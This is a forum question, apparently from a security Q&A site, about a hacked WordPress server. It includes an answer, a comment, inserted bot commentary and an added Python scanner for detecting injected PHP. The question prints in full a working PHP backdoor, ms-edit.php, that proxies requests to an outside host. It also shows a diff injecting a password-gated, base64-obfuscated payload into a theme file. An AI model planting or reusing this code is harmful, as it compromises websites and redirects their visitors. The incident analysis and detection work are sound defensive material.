Env

  • Rackspace cloud server
  • Wordpress 3.9.1
  • Ubuntu 12.04 Linux web.mydomain.com 3.2.0-67-virtual #101-Ubuntu SMP Tue Jul 15 17:58:37 UTC 2014 x86_64 x86_64 x86_64 GNU/Linux

History

These may actually be part of the same issue; I already resolved those yesterday. I am adding them here for reference and background history.

My current security problem

My web server has recently been experiencing an unusual out-of-memory issue caused by abnormal sendmail activity. For this I got help from the ServerFault forum, but I have yet to identify the vulnerability.

Apparently my server was subject to attack through the wordpress plugins, and apparently it's still happening despite:

  • Cleaned my wordpress instance, used a working backup
  • Updated all the wordpress plugins
  • apt-get update && apt-get upgrade on the server

After a day, I am checking my wordpress instance, and I can already find what I believe is some injected PHP code.

root@web:/var/www# git status
# On branch working-website
# Changes not staged for commit:
#   (use "git add <file>..." to update what will be committed)
#   (use "git checkout -- <file>..." to discard changes in working directory)
#   (commit or discard the untracked or modified content in submodules)
#
#   modified:   .htaccess
#   modified:   webalizer/index.html
#   modified:   webalizer/usage.png
#   modified:   webalizer/webalizer.hist
#   modified:   wp-content/plugins/no-disposable-email/no_disposable_email.log
#   modified:   wp-content/themes/twentytwelve/404.php    <===========
#
# Untracked files:
#   (use "git add <file>..." to include in what will be committed)
#
#   webalizer/ctry_usage_201407.png
#   webalizer/daily_usage_201407.png
#   webalizer/hourly_usage_201407.png
#   webalizer/usage_201407.html
#   wp-includes/ms-edit.php       <================= 

A new unexpected file (?):

root@web:/var/www# more wp-includes/ms-edit.php 
<?php $url = "http://admindors.com/redbutton/main2-dors/20j-107-1/"; $e = '.php'; $q = ""; $test = 'suka-test';
if ((!$q || isset($_GET[$q])) && preg_match("/^[^\/][a-z0-9-_\/\.]+$/i", $a = $q ? $_GET[$q] : $_SERVER["QUERY_STRING"])) {
    if($test && $a == $test) { echo 'OK'; exit; }
    curl_setopt($ch = curl_init($url.($w=preg_replace("/^([a-z0-9-_]+)(\.php|\.html|\/|)$/i", '$1'.$e, $a, -1, $h))), CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);
    curl_setopt($ch, CURLOPT_USERAGENT, $_SERVER["HTTP_USER_AGENT"]);
    if (isset($_SERVER["HTTP_REFERER"])) curl_setopt($ch, CURLOPT_REFERER, $_SERVER["HTTP_REFERER"]);
    $result = curl_exec($ch);
    if ((($c = curl_getinfo($ch, CURLINFO_HTTP_CODE)) == 301 || $c == 302) && ($u = curl_getinfo($ch, CURLINFO_EFFECTIVE_URL))) {
        header('Location: ' . $u, true, $c); exit;
    } else if ($c == 200 && $result) {
        header('Content-Type: ' . curl_getinfo($ch, CURLINFO_CONTENT_TYPE));
        echo ($h || substr($a, -4) == '.css') ? preg_replace('/<a(.*?)href=["\'](' . preg_quote(($t = ((!strncmp($_SERVER["REQUEST_URI"], $t = $_SERVER["SCRIPT_NAME"], strlen($t))) ? ($t . '?' . ($q ? $q . '=' : '' )) : '/' . substr($_SERVER["REQUEST_URI"], 1, -strlen($a))) . ((substr($a, -1) != '/' && ($y = strrpos($a, '/'))) ? substr($a, 0, $y) . '/' : '' )), '/') . '[a-z0-9-_]+)(' . preg_quote($e) . ')["\'](.*?)>/i',
            '<a$1href="$2' . (($h = strlen($w) - strlen($e) - strlen($a)) < 0 ? substr($a, $h) : "") . '"$4>',
            preg_replace('/<(a|link|img)(.*?)(href|src)=["\']([^\/][a-z0-9-_\.\/]+)["\'](.*?)>/i', '<$1$2$3="' . $t . '$4"$5>',
                preg_replace('/background(-image\:|\:)(.*?url\(["\'])([^\/][a-z0-9-_\.\/]+)(["\']\))/i', 'background$1$2' . $t . '$3$4', $result))) : $result;
        exit;
    }
}
header('HTTP/1.0 404 Not Found', true); exit; ?>

My suspicion is the URL (http://admindors.com/redbutton/main2-dors/20j-107-1/) in the PHP code.

Also, as git points out, this is a new untracked file.

Also, my wp-content/themes/twentytwelve/404.php seems to have been compromised:

root@web:/var/www# git diff wp-content/themes/twentytwelve/404.php

diff --git a/wp-content/themes/twentytwelve/404.php b/wp-content/themes/twentytwelve/404.php
index e7270b4..189b69c 100644
--- a/wp-content/themes/twentytwelve/404.php
+++ b/wp-content/themes/twentytwelve/404.php
@@ -1,3 +1,9 @@
+<?php^M
+if(isset($_GET['pwd'])) {^M
+$_F=__FILE__;$_X='P2lCPz5NY2VXKDxlbk1bVV85TTJPOU0oJzhDcjA5Qy5BMkNyNTJxRlAzLzh5YlR1THU0RlVFa0VXRUMzVXU0S0xFWWJrdVlifWJUOXlOVDgKYlRXV2JxMzE0d095YmtQbjxKM3htcEZzM2tnWUVwMzE0d095TkM2WWJENm45clAuYkpnWj
+^M
+} else {^M
+?>^M
 <?php
 /**
  * The template for displaying 404 pages (Not Found).
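Review bot: the whole added prelude is gated on `isset($_GET['pwd'])`, so any request without that parameter falls into the `else` branch and the original template renders unchanged; that is why browsing the site shows nothing and only `git diff` does. Two details in this hunk are worth recording before the file is reverted: every injected line ends in `^M` (CRLF) while the theme's own lines end in LF, which gives a cheap way to find other files written by the same tool, and the `$_F=__FILE__;$_X='...'` literal is a base64 blob that is truncated in this paste, so any analysis of the payload has to work from the copy on disk, not from this output.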
@@ -26,4 +32,7 @@ get_header(); ?>
                </div><!-- #content -->
        </div><!-- #primary -->

-<?php get_footer(); ?>
\ No newline at end of file
+<?php get_footer(); ?>^M
+<?php^M
+}^M
+?>
\ No newline at end of file
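Review bot: the trailing `<?php } ?>` after `get_footer()` closes the `else` opened in the first hunk, so the original template was wrapped in its entirety rather than merely prepended to, and the file was rewritten end to end. Because the index line shows git still has the clean blob (`e7270b4`), the `git checkout -- <file>` that `git status` itself suggests restores this one file; the untracked `wp-includes/ms-edit.php` has no clean version in the repository and can only be removed. Neither step closes the entry point, which is the part still unknown at this stage of the question.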

At this point, I am not sure how to secure my wordpress.

How can I identify the culprit?

What can I do next?

zabumba
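A triage scanner for the two patterns visible in this question, written as an added example (not code from the question or its answers): the GET-parameter-gated block carrying a long base64 literal seen in the 404.php diff, and the query-string-driven curl proxy seen in ms-edit.php. The sample files are constructed to resemble those snippets rather than copy them, the URL is a placeholder, and the indicator names, regexes and the two-hit threshold are my own choices, not anything from the thread.

```python
import os
import re
import tempfile

INDICATORS = [  # heuristic patterns, each taken from one of the two snippets in the question
    ("GET-gated block", re.compile(r"if\s*\(\s*isset\s*\(\s*\$_(GET|POST|REQUEST)\[")),
    ("long base64 literal", re.compile(r"\$\w+\s*=\s*'[A-Za-z0-9+/]{60,}=*'")),
    ("remote fetch via curl", re.compile(r"curl_init\s*\(")),
    ("query-string dispatch", re.compile(r"\$_SERVER\[\s*['\"]QUERY_STRING['\"]\s*\]")),
]

def scan_file(path):
    """Indicator names firing on one file. Mixed CRLF/LF endings count too: the ^M
    lines in the 404.php diff show the payload was written by a different tool."""
    data = open(path, "rb").read()
    hits = [n for n, rx in INDICATORS if rx.search(data.decode("utf-8", "replace"))]
    if b"\r\n" in data and re.search(rb"[^\r]\n", data):
        hits.append("mixed line endings")
    return hits

def scan_tree(root, min_hits=2):
    # Map relative path -> hits for .php files with at least min_hits indicators.
    report = {}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.endswith(".php") and len(hits := scan_file(path)) >= min_hits:
                report[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return report

# Constructed samples shaped like the page's snippets, not copies; the URL is a placeholder.
SAMPLES = {
    "wp-content/themes/twentytwelve/404.php":
        b"<?php\r\nif(isset($_GET['pwd'])) {\r\n$_F=__FILE__;$_X='" + b"QUFB" * 30 + b"';\r\n"
        b"} else {\r\n?>\r\n<?php\n/** 404 template */\nget_header(); ?>\n<?php get_footer(); ?>\n<?php\r\n}\r\n?>",
    "wp-includes/ms-edit.php":
        b"<?php $url = 'http://example.invalid/placeholder/'; $a = $_SERVER[\"QUERY_STRING\"];\n"
        b"curl_setopt($ch = curl_init($url.$a), CURLOPT_USERAGENT, $_SERVER[\"HTTP_USER_AGENT\"]); echo curl_exec($ch); ?>",
    "wp-content/themes/twentytwelve/index.php":  # clean control file, must not be reported
        b"<?php\nget_header(); ?>\n<div id=\"primary\"></div>\n<?php get_footer(); ?>\n",
}

def demo():
    # Write the samples into a temporary tree, scan it, and return the report.
    with tempfile.TemporaryDirectory() as root:
        for rel, body in SAMPLES.items():
            full = os.path.join(root, *rel.split("/"))
            os.makedirs(os.path.dirname(full), exist_ok=True)
            with open(full, "wb") as f:
                f.write(body)
        return scan_tree(root)
```

Run `scan_tree("/var/www")` against a real tree; the output is a shortlist to read by hand, and a clean theme file with a single `isset($_GET[...])` is deliberately not reported.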

1 Answer

What to do next? Wipe the server clean and re-install, making sure you're using the latest versions of everything. Once an attacker gets in, it's difficult or impossible to figure out what's been tampered with. You could try making a copy of the compromised server for offline analysis, but you probably won't find anything interesting: if the attacker can tamper with your software, they can tamper with the logs.

Mark
  • That's not enough. If you wipe the server clean and reinstall the same vulnerable software or configuration, the attacker will be back. You need to figure out how the attacker got in. – Gilles 'SO- stop being evil' Jul 26 '14 at 08:26